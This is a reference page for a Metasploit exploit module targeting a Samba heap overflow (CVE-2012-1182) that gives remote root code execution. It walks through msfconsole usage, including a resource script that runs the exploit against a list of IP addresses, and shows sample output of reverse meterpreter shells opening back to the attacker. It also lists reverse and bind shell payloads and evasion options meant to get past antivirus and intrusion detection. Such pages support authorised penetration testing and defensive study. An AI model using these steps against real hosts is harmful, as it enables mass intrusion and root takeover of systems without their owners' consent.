Samba SetInformationPolicy AuditEventsInfo Heap Overflow - Metasploit


This page contains detailed information about how to use the exploit/linux/samba/setinfopolicy_heap metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Samba SetInformationPolicy AuditEventsInfo Heap Overflow
Module: exploit/linux/samba/setinfopolicy_heap
Source code: modules/exploits/linux/samba/setinfopolicy_heap.rb
Disclosure date: 2012-04-10
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): Linux, Unix
Target service / protocol: microsoft-ds, netbios-ssn
Target network port(s): 139, 445
List of CVEs: CVE-2012-1182

This module triggers a vulnerability in the LSA RPC service of the Samba daemon because of an error on the PIDL auto-generated code. Making a specially crafted call to SetInformationPolicy to set a PolicyAuditEventsInformation allows to trigger a heap overflow and finally execute arbitrary code with root privileges. The module uses brute force to guess the stackpivot/rop chain or the system() address and redirect flow there in order to bypass NX. The start and stop addresses for brute forcing have been calculated empirically. On the other hand the module provides the StartBrute and StopBrute which allow the user to configure his own addresses.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


Using setinfopolicy_heap against a single host

Normally, you can use exploit/linux/samba/setinfopolicy_heap this way:

msf > use exploit/linux/samba/setinfopolicy_heap
msf exploit(setinfopolicy_heap) > show targets
    ... a list of targets ...
msf exploit(setinfopolicy_heap) > set TARGET target-id
msf exploit(setinfopolicy_heap) > show options
    ... show and set options ...
msf exploit(setinfopolicy_heap) > exploit

Using setinfopolicy_heap against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your setinfopolicy_heap will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/linux/samba/setinfopolicy_heap")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the linux/samba/setinfopolicy_heap exploit module looks in the msfconsole:

msf6 > use exploit/linux/samba/setinfopolicy_heap

[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/samba/setinfopolicy_heap) > show info

       Name: Samba SetInformationPolicy AuditEventsInfo Heap Overflow
     Module: exploit/linux/samba/setinfopolicy_heap
   Platform: Linux, Unix
       Arch: 
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2012-04-10

Provided by:
  Unknown
  blasty
  mephos
  sinn3r <[email protected]>
  juan vazquez <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   2:3.5.11~dfsg-1ubuntu2 on Ubuntu Server 11.10
  1   2:3.5.8~dfsg-1ubuntu2 on Ubuntu Server 11.10
  2   2:3.5.8~dfsg-1ubuntu2 on Ubuntu Server 11.04
  3   2:3.5.4~dfsg-1ubuntu8 on Ubuntu Server 10.10
  4   2:3.5.6~dfsg-3squeeze6 on Debian Squeeze
  5   3.5.10-0.107.el5 on CentOS 5

Check supported:
  Yes

Basic options:
  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  RHOSTS                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT       445              yes       The SMB service port (TCP)
  StartBrute                   no        Start Address For Brute Forcing
  StopBrute                    no        Stop Address For Brute Forcing

Payload information:
  Space: 600

Description:
  This module triggers a vulnerability in the LSA RPC service of the 
  Samba daemon because of an error on the PIDL auto-generated code. 
  Making a specially crafted call to SetInformationPolicy to set a 
  PolicyAuditEventsInformation allows to trigger a heap overflow and 
  finally execute arbitrary code with root privileges. The module uses 
  brute force to guess the stackpivot/rop chain or the system() 
  address and redirect flow there in order to bypass NX. The start and 
  stop addresses for brute forcing have been calculated empirically. 
  On the other hand the module provides the StartBrute and StopBrute 
  which allow the user to configure his own addresses.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2012-1182
  OSVDB (81303)
  http://www.securityfocus.com/bid/52973
  http://www.zerodayinitiative.com/advisories/ZDI-12-069

Module Options


This is a complete list of options available in the linux/samba/setinfopolicy_heap exploit:

msf6 exploit(linux/samba/setinfopolicy_heap) > show options

Module options (exploit/linux/samba/setinfopolicy_heap):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   RHOSTS                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT       445              yes       The SMB service port (TCP)
   StartBrute                   no        Start Address For Brute Forcing
   StopBrute                    no        Stop Address For Brute Forcing

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   2:3.5.11~dfsg-1ubuntu2 on Ubuntu Server 11.10

Advanced Options


Here is a complete list of advanced options supported by the linux/samba/setinfopolicy_heap exploit:

msf6 exploit(linux/samba/setinfopolicy_heap) > show advanced

Module advanced options (exploit/linux/samba/setinfopolicy_heap):

   Name                    Current Setting    Required  Description
   ----                    ---------------    --------  -----------
   BruteStep                                  no        Step size between brute force attempts
   BruteWait                                  no        Delay between brute force attempts
   CHOST                                      no        The local client address
   CPORT                                      no        The local client port
   ConnectTimeout          10                 yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                     no        The information file that contains context information
   DCERPC::ReadTimeout     10                 yes       The number of seconds to wait for DCERPC responses
   DisablePayloadHandler   false              no        Disable the handler code for the selected payload
   EnableContextEncoding   false              no        Use transient context when encoding payloads
   NTLM::SendLM            true               yes       Always send the LANMAN response (except when NTLMv2_session is specified)
   NTLM::SendNTLM          true               yes       Activate the 'Negotiate NTLM key' flag, indicating the use of NTLM responses
   NTLM::SendSPN           true               yes       Send an avp of type SPN in the ntlmv2 client blob, this allows authentication on Windows 7+/Server 2008 R2+ when SPN is required
   NTLM::UseLMKey          false              yes       Activate the 'Negotiate Lan Manager Key' flag, using the LM key when the LM response is sent
   NTLM::UseNTLM2_session  true               yes       Activate the 'Negotiate NTLM2 key' flag, forcing the use of a NTLMv2_session
   NTLM::UseNTLMv2         true               yes       Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key is true
   Proxies                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   SMB::AlwaysEncrypt      true               yes       Enforces encryption even if the server does not require it (SMB3.x only). Note that when it is set to false, the SMB client will still encrypt the communication if the server requires it
   SMB::ChunkSize          500                yes       The chunk size for SMB segments, bigger values will increase speed but break NT 4.0 and SMB signing
   SMB::Native_LM          Windows 2000 5.0   yes       The Native LM to send during authentication
   SMB::Native_OS          Windows 2000 2195  yes       The Native OS to send during authentication
   SMB::VerifySignature    false              yes       Enforces client-side verification of server response signatures
   SMBDirect               true               no        The target port is a raw SMB service (not NetBIOS)
   SMBDomain               .                  no        The Windows domain to use for authentication
   SMBName                 *SMBSERVER         yes       The NetBIOS hostname (required for port 139 connections)
   SMBPass                                    no        The password for the specified username
   SMBUser                                    no        The username to authenticate as
   SSL                     false              no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                  no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode           PEER               no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion              Auto               yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   VERBOSE                 false              no        Enable detailed status messages
   WORKSPACE                                  no        Specify the workspace for this module
   WfsDelay                5                  no        Additional delay in seconds to wait for a session

Payload advanced options (linux/x86/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AppendExit                   true             no        Append a stub that executes the exit(0) system call
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugLevel        0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependChrootBreak           false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                  true             no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid                false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid              true             no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid             false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid             false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid              true             no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid                false            no        Prepend a stub that executes the setuid(0) system call
   RemoteMeterpreterDebugFile                    no        Redirect Debug Info to a Log File
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/samba/setinfopolicy_heap module can exploit:

msf6 exploit(linux/samba/setinfopolicy_heap) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   2:3.5.11~dfsg-1ubuntu2 on Ubuntu Server 11.10
   1   2:3.5.8~dfsg-1ubuntu2 on Ubuntu Server 11.10
   2   2:3.5.8~dfsg-1ubuntu2 on Ubuntu Server 11.04
   3   2:3.5.4~dfsg-1ubuntu8 on Ubuntu Server 10.10
   4   2:3.5.6~dfsg-3squeeze6 on Debian Squeeze
   5   3.5.10-0.107.el5 on CentOS 5

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/samba/setinfopolicy_heap exploit:

msf6 exploit(linux/samba/setinfopolicy_heap) > show payloads

Compatible Payloads
===================

   #   Name                                              Disclosure Date  Rank    Check  Description
   -   ----                                              ---------------  ----    -----  -----------
   0   payload/generic/custom                                             normal  No     Custom Payload
   1   payload/generic/debug_trap                                         normal  No     Generic x86 Debug Trap
   2   payload/generic/shell_bind_tcp                                     normal  No     Generic Command Shell, Bind TCP Inline
   3   payload/generic/shell_reverse_tcp                                  normal  No     Generic Command Shell, Reverse TCP Inline
   4   payload/generic/tight_loop                                         normal  No     Generic x86 Tight Loop
   5   payload/linux/x86/adduser                                          normal  No     Linux Add User
   6   payload/linux/x86/chmod                                            normal  No     Linux Chmod
   7   payload/linux/x86/exec                                             normal  No     Linux Execute Command
   8   payload/linux/x86/meterpreter/bind_ipv6_tcp                        normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   9   payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   10  payload/linux/x86/meterpreter/bind_nonx_tcp                        normal  No     Linux Mettle x86, Bind TCP Stager
   11  payload/linux/x86/meterpreter/bind_tcp                             normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
   12  payload/linux/x86/meterpreter/bind_tcp_uuid                        normal  No     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
   13  payload/linux/x86/meterpreter/reverse_ipv6_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager (IPv6)
   14  payload/linux/x86/meterpreter/reverse_nonx_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager
   15  payload/linux/x86/meterpreter/reverse_tcp                          normal  No     Linux Mettle x86, Reverse TCP Stager
   16  payload/linux/x86/meterpreter/reverse_tcp_uuid                     normal  No     Linux Mettle x86, Reverse TCP Stager
   17  payload/linux/x86/metsvc_bind_tcp                                  normal  No     Linux Meterpreter Service, Bind TCP
   18  payload/linux/x86/metsvc_reverse_tcp                               normal  No     Linux Meterpreter Service, Reverse TCP Inline
   19  payload/linux/x86/read_file                                        normal  No     Linux Read File
   20  payload/linux/x86/shell/bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   21  payload/linux/x86/shell/bind_ipv6_tcp_uuid                         normal  No     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   22  payload/linux/x86/shell/bind_nonx_tcp                              normal  No     Linux Command Shell, Bind TCP Stager
   23  payload/linux/x86/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager (Linux x86)
   24  payload/linux/x86/shell/bind_tcp_uuid                              normal  No     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   25  payload/linux/x86/shell/reverse_ipv6_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager (IPv6)
   26  payload/linux/x86/shell/reverse_nonx_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
   27  payload/linux/x86/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   28  payload/linux/x86/shell/reverse_tcp_uuid                           normal  No     Linux Command Shell, Reverse TCP Stager
   29  payload/linux/x86/shell_bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind TCP Inline (IPv6)
   30  payload/linux/x86/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   31  payload/linux/x86/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   32  payload/linux/x86/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   33  payload/linux/x86/shell_reverse_tcp_ipv6                           normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)

Evasion Options


Here is the full list of possible evasion options supported by the linux/samba/setinfopolicy_heap exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/samba/setinfopolicy_heap) > show evasion

Module evasion options:

   Name                             Current Setting  Required  Description
   ----                             ---------------  --------  -----------
   DCERPC::fake_bind_multi          true             no        Use multi-context bind calls
   DCERPC::fake_bind_multi_append   0                no        Set the number of UUIDs to append the target
   DCERPC::fake_bind_multi_prepend  0                no        Set the number of UUIDs to prepend before the target
   DCERPC::max_frag_size            4096             yes       Set the DCERPC packet fragmentation size
   DCERPC::smb_pipeio               rw               no        Use a different delivery method for accessing named pipes (Accepted: rw, trans)
   SMB::obscure_trans_pipe_level    0                yes       Obscure PIPE string in TransNamedPipe (level 0-3)
   SMB::pad_data_level              0                yes       Place extra padding between headers and data (level 0-3)
   SMB::pad_file_level              0                yes       Obscure path names used in open/create (level 0-3)
   SMB::pipe_evasion                false            yes       Enable segmented read/writes for SMB Pipes
   SMB::pipe_read_max_size          1024             yes       Maximum buffer size for pipe reads
   SMB::pipe_read_min_size          1                yes       Minimum buffer size for pipe reads
   SMB::pipe_write_max_size         1024             yes       Maximum buffer size for pipe writes
   SMB::pipe_write_min_size         1                yes       Minimum buffer size for pipe writes
   TCP::max_send_size               0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay                  0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

StartBrute should not be larger than StopBrute


Here is a relevant code snippet related to the "StartBrute should not be larger than StopBrute" error message:

182:	      if datastore['StopBrute'] and datastore['StopBrute'] > 0
183:	        bf.stop_addresses['libgcrypt_base'] = datastore['StopBrute']
184:	      end
185:	
186:	      if bf.start_addresses['libgcrypt_base'] > bf.stop_addresses['libgcrypt_base']
187:	        raise ArgumentError, "StartBrute should not be larger than StopBrute"
188:	      end
189:	    end
190:	    super
191:	  end
192:	

Use Rex client (SMB1 only) since this module is not compatible with RubySMB client


Here is a relevant code snippet related to the "Use Rex client (SMB1 only) since this module is not compatible with RubySMB client" error message:

197:	    datastore['DCERPC::smb_pipeio'] = 'trans'
198:	    datastore['DCERPC::ReadTimeout'] = 3
199:	
200:	    pipe = "lsarpc"
201:	
202:	    vprint_status('Use Rex client (SMB1 only) since this module is not compatible with RubySMB client')
203:	    connect(versions: [1])
204:	    smb_login()
205:	
206:	    handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{pipe}"])
207:	    dcerpc_bind(handle)

Server is most likely patched...


Here is a relevant code snippet related to the "Server is most likely patched..." error message:

255:	
256:	    begin
257:	      call(dcerpc, 0x08, stub)
258:	    rescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply, ::EOFError
259:	    rescue Rex::Proto::DCERPC::Exceptions::Fault
260:	      print_error('Server is most likely patched...')
261:	    rescue Timeout::Error
262:	      print_status("Timeout")
263:	    rescue Rex::Proto::SMB::Exceptions::LoginError
264:	      print_status("Rex::Proto::SMB::Exceptions::LoginError")
265:	    rescue => e

Rex::Proto::SMB::Exceptions::LoginError


Here is a relevant code snippet related to the "Rex::Proto::SMB::Exceptions::LoginError" error message:

259:	    rescue Rex::Proto::DCERPC::Exceptions::Fault
260:	      print_error('Server is most likely patched...')
261:	    rescue Timeout::Error
262:	      print_status("Timeout")
263:	    rescue Rex::Proto::SMB::Exceptions::LoginError
264:	      print_status("Rex::Proto::SMB::Exceptions::LoginError")
265:	    rescue => e
266:	      if e.to_s =~ /STATUS_PIPE_DISCONNECTED/
267:	        print_status('Server disconnected, this is expected')
268:	      end
269:	    end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Unknown
  • blasty
  • mephos
  • sinn3r
  • juan vazquez

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.